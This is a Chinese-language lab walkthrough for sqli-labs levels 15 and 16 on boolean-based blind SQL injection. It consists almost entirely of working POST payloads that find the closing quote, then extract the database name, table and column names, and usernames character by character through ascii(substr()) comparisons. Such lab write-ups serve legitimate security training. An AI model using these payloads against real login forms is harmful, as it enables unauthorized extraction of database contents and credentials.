Less-11 到 Less-12 是布尔盲注
页面回显的结果只有两种 true 和 false,登录成功和登录失败,可以拿这一点作为布尔盲注的判断
true:
false:
Less-15
闭合字符:
判断闭合字符:'$uname' 或 '$passwd'
uname=username" or 1 #&passwd=password&Submit=Submit
#返回了 false,需要继续尝试
uname=username' or 1 #&passwd=password&Submit=Submit
#返回了 true,即确定了闭合字符
判断当前数据库名的长度:
uname=username' or length(database())=8 #&passwd=password&Submit=Submit
#直接给了true值
匹配数据库名的ASCII码:
uname=username' or ascii(substr(database(),1,1))=115 #&passwd=password&Submit=Submit
uname=username' or ascii(substr(database(),2,1))=101 #&passwd=password&Submit=Submit
...
#直接给了true值
判断表的数量:
uname=username' or (select count(table_name) from information_schema.tables where table_schema="security")=4 #&passwd=password&Submit=Submit
#直接给了true值
匹配表名的ASCII码:
uname=username' or ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=101 #&passwd=password&Submit=Submic
...
#直接给了true值
判断字段的数量:
uname=username' or (select count(column_name) from information_schema.columns where table_schema="security" and table_name="users")=3 #&passwd=password&Submit=Submit
#直接给了true值
匹配字段名的ASCII码:
uname=username' or ascii(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),1,1))=105 #&passwd=password&Submit=Submic
...
#直接给了true值
判断字段下有多少数据:
uname=username' or (select count(username) from security.users)=13 #&passwd=password&Submit=Submic
#直接给了true值
查询数据:
uname=username' or ascii(substr((select username from security.users limit 0,1),1,1))=68 #&passwd=password&Submit=Submic
...
#直接给了true值
Less-16
跟Less-15一样的注入手法
闭合字符:("$uname") 或 ("$passwd")
uname=username") or length(database())=8 #&passwd=password&Submit=Submit
#判断当前数据库名的长度
uname=username") or ascii(substr(database(),1,1))=115 #&passwd=password&Submit=Submit
uname=username") or ascii(substr(database(),2,1))=101 #&passwd=password&Submit=Submit
...
#匹配数据库名的ASCII码
uname=username") or (select count(table_name) from information_schema.tables where table_schema="security")=4 #&passwd=password&Submit=Submit
#直判断表的数量
uname=username") or ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=101 #&passwd=password&Submit=Submic
...
#匹配表名的ASCII码
uname=username") or (select count(column_name) from information_schema.columns where table_schema="security" and table_name="users")=3 #&passwd=password&Submit=Submit
#判断字段的数量
uname=username") or ascii(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),1,1))=105 #&passwd=password&Submit=Submic
...
#匹配字段名的ASCII码
uname=username") or (select count(username) from security.users)=13 #&passwd=password&Submit=Submic
#判断字段下有多少数据
uname=username") or ascii(substr((select username from security.users limit 0,1),1,1))=68 #&passwd=password&Submit=Submic
...
#查询数据